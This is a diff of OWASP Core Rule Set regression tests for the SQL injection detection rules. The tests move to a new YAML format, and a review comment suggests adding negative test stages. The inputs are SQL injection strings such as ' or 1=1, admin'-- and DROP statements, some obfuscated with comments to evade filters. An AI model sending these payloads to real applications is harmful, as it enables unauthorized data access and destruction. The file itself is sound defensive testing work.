text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "quarter. (" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 81 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "rand(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 82 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "Rand (" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 83 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "RAND(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 84 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "replace(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 85 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "REPLACE(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 86 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "round (" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 87 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "round(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 88 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "rtrim(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 89 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "RTRIM(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 90 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=sin (" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 91 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SIN(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 92 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=sleep(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 93 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SLEEP (" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 94 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=strcmp(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 95 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=substr(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 96 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SUBSTR(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 97 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=substring(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 98 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SUBSTRING(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 99 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=sysdate(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 100 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "time (" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 101 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=time%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 102 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=trim%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 103 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=Uncompress+%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 104 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=unhex%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 105 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=uNhEx%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 106 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=updatexml%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 107 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=UpdateXML%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 108 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=UPPER%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 109 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=user+%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 110 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=user%2F%3F%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 111 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=user%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 112 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=values+%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 113 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=VALUES%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 114 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=version%3D%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 115 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=version%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 116 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=xmltype%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 117 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=XMLType%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 118 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=year%5D%3D%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942420.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942420.yaml index 576280e8a..b0d3ee0e6 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942420.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942420.yaml 
@@ -1,24 +1,22 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None - enabled: true - name: 942420.yaml +rule_id: 942420 tests: - - test_title: 942420-1 + - test_id: 1 desc: "Restricted SQL Character Anomaly Detection (cookies): # of special characters exceeded (8)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Cookie: "ar=%7e%7e%7e%7e%7e%7e%7e%7e%7e&foo=var" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - output: - log_contains: id "942420" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Cookie: "ar=%7e%7e%7e%7e%7e%7e%7e%7e%7e&foo=var" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + output: + log: + expect_ids: [942420] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942421.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942421.yaml index cca5bfa0c..4b71697ff 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942421.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942421.yaml 
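Review bot: The migrated 942420 test still carries only the positive stage, so after the switch to `log.expect_ids` nothing here would catch the rule starting to fire on benign cookies, and the same holds for the 942421, 942430, 942431 and 942432 hunks below; a false-positive regression in these special-character-count rules would pass CI unnoticed. Since the v1 format is being adopted anyway, a second stage per test sending the same request with a cookie (or argument) below the threshold named in `desc` and asserting `no_expect_ids: [942420]` would pin both sides of the boundary. The `%7e%7e%7e` cookie value in the excerpt is a constructed example; any value under the eight-character limit serves, provided it does not trip a different rule at the paranoia level the suite runs with.
```yaml
    stages:
      # … unchanged: existing positive stage (expect_ids: [942420]) …
      - input:
          dest_addr: 127.0.0.1
          headers:
            Host: localhost
            Cookie: "ar=%7e%7e%7e&foo=var"
            User-Agent: "OWASP CRS test agent"
            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
          method: POST
          port: 80
          uri: "/post"
          version: HTTP/1.0
        output:
          log:
            no_expect_ids: [942420]
```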
@@ -1,24 +1,22 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None - enabled: true - name: 942421.yaml +rule_id: 942421 tests: - - test_title: 942421-1 + - test_id: 1 desc: "Restricted SQL Character Anomaly Detection (cookies): # of special characters exceeded (3)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Cookie: "cookie=@@@@@@@@@@@@@" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "942421" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Cookie: "cookie=@@@@@@@@@@@@@" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log: + expect_ids: [942421] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942430.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942430.yaml index aa1a717cd..b8e732451 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942430.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942430.yaml 
@@ -1,24 +1,22 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None - enabled: true - name: 942430.yaml +rule_id: 942430 tests: - - test_title: 942430-1 + - test_id: 1 desc: "Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=(((((())))))&var2=whatever" - version: HTTP/1.0 - output: - log_contains: id "942430" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=(((((())))))&var2=whatever" + version: HTTP/1.0 + output: + log: + expect_ids: [942430] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942431.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942431.yaml index fb9b2e02a..0254f2112 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942431.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942431.yaml 
@@ -1,24 +1,22 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None - enabled: true - name: 942431.yaml +rule_id: 942431 tests: - - test_title: 942431-1 + - test_id: 1 desc: "Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=-------------------&var2=whatever" - version: HTTP/1.0 - output: - log_contains: id "942431" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=-------------------&var2=whatever" + version: HTTP/1.0 + output: + log: + expect_ids: [942431] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942432.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942432.yaml index b30a904c8..0a34adce1 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942432.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942432.yaml 
@@ -1,24 +1,22 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None - enabled: true - name: 942432.yaml +rule_id: 942432 tests: - - test_title: 942432-1 + - test_id: 1 desc: "Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=;;dd foo bar" - version: HTTP/1.0 - output: - log_contains: id "942432" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=;;dd foo bar" + version: HTTP/1.0 + output: + log: + expect_ids: [942432] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942440.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942440.yaml index 508f02823..7af45734d 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942440.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942440.yaml 
@@ -1,339 +1,337 @@ --- meta: author: "Christian S.J. Peron, Max Leske, azurit" - description: None - enabled: true - name: 942440.yaml +rule_id: 942440 tests: - - test_title: 942440-1 + - test_id: 1 desc: "SQL Comment Sequence" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?var=DROP%20sampletable%3b--" - version: HTTP/1.0 - output: - log_contains: id "942440" - - test_title: 942440-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?var=DROP%20sampletable%3b--" + version: HTTP/1.0 + output: + log: + expect_ids: [942440] + - test_id: 2 desc: "SQL Comment Sequence" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "POST" - port: 80 - version: "HTTP/1.0" - uri: "/post" - data: "test=' or 1=1;%00" - output: - log_contains: id "942440" - - test_title: 942440-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=' or 1=1;%00" + output: + log: + expect_ids: [942440] + - test_id: 3 desc: "SQL Comment Sequence" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: 
"POST" - port: 80 - version: "HTTP/1.0" - uri: "/post" - data: "test=OR 1# " - output: - log_contains: id "942440" - - test_title: 942440-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=OR 1# " + output: + log: + expect_ids: [942440] + - test_id: 4 desc: "SQL Comment Sequence" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "POST" - port: 80 - version: "HTTP/1.0" - uri: "/post" - data: "test=admin'--" - output: - log_contains: id "942440" - - test_title: 942440-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=admin'--" + output: + log: + expect_ids: [942440] + - test_id: 5 desc: "SQL Comment Sequence" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "POST" - port: 80 - version: "HTTP/1.0" - uri: "/post" - data: "test=DROP/*comment*/sampletable" - output: - log_contains: id "942440" - - test_title: 942440-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=DROP/*comment*/sampletable" + 
output: + log: + expect_ids: [942440] + - test_id: 6 desc: "SQL Comment Sequence" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "POST" - port: 80 - version: "HTTP/1.0" - uri: "/post" - data: "test=DR/**/OP/*bypass deny listing*/sampletable" - output: - log_contains: id "942440" - - test_title: 942440-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=DR/**/OP/*bypass deny listing*/sampletable" + output: + log: + expect_ids: [942440] + - test_id: 7 desc: "SQL Comment Sequence" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "POST" - port: 80 - version: "HTTP/1.0" - uri: "/post" - data: "test=SELECT/*avoid-spaces*/password/**/FROM/**/Members" - output: - log_contains: id "942440" - - test_title: 942440-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=SELECT/*avoid-spaces*/password/**/FROM/**/Members" + output: + log: + expect_ids: [942440] + - test_id: 8 desc: "SQL Comment Sequence" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "POST" 
